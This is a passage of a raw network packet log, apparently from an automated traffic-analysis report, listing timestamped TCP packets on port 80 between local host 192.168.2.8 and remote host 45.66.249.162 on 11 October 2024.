                                                                                                                                                              Oct 11, 2024 22:32:33.165280104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165287018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165294886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165299892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165318012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165333986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165651083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165663004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165678978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165688038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165700912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165712118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165716887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165721893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.165745020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.165759087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166050911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166060925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166078091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166085005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166098118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166100025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166109085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166116953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166131973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166136026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166143894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166146994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166167021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166168928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166188002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166202068 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166619062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166629076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166646957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166656017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166672945 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166682005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166691065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166693926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166718960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166719913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166733980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166733980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166750908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166752100 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166769981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166785955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166817904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166827917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.166853905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166876078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.166996002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.167031050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.167042971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.167052984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.167078018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.167078018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.167089939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.167088985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.167109013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.167113066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.167129040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.167140961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361382008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361421108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361432076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361463070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361474037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361495972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361510992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361510992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361510992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361510992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361525059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361562014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361562967 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361567974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361569881 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361582041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361599922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361603975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361629963 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361632109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361656904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361668110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361670971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361670971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361686945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361697912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361706972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361718893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361732960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361736059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361746073 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361761093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361768007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361778975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361787081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361802101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361803055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361819029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361824036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361835957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361840010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361854076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361855984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361870050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361872911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361886978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361902952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361907005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361907005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361922026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361931086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361941099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361947060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361960888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361967087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361978054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.361978054 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361994028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.361998081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362013102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362026930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362078905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362099886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362112999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362118959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362131119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362133026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362145901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362149954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362170935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362180948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362183094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362199068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362221956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362222910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362236977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362243891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362256050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362261057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362272978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362279892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362288952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362298012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362304926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362317085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362333059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362333059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362344980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362348080 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362356901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362376928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362377882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362391949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362399101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362411022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362416983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362426996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362435102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362443924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362468958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362476110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362478971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362490892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362508059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362509966 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362523079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362525940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362543106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362560987 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362617016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362632036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362647057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362648964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362662077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362665892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362680912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362682104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362695932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362699032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362715006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362715006 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362726927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362742901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362751961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362767935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362778902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362797022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362802982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362812042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362828970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362831116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362850904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362890959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362911940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362922907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362941980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362943888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362957001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362973928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362977982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362977982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.362997055 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.362997055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363006115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363013983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363022089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363029957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363040924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363044024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363060951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363061905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363076925 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363076925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363089085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363094091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363111973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363114119 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363126993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363131046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363143921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363147020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363162994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363163948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363179922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363183975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363195896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363198996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363214016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363214970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363230944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.363234997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363250971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.363265991 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.479731083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.479749918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.479773045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.479851007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.479851961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.479948044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.479993105 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480088949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480099916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480118990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480129004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480129957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480146885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480154037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480159044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480165005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480180979 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480190992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480201006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480211020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480225086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480238914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480238914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480242014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480252028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480268955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480281115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480290890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480295897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480309010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480318069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480320930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480341911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480345964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480365992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480370998 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480385065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480397940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480397940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480406046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480410099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480417013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480422020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480441093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480448961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480453014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480469942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480479002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480489016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480493069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480506897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480515957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480537891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480576038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480586052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480602980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480612040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480618954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480631113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480654001 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480690956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:33.480725050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:33.480736971 CEST804970745.66.249.162192.168.2.8
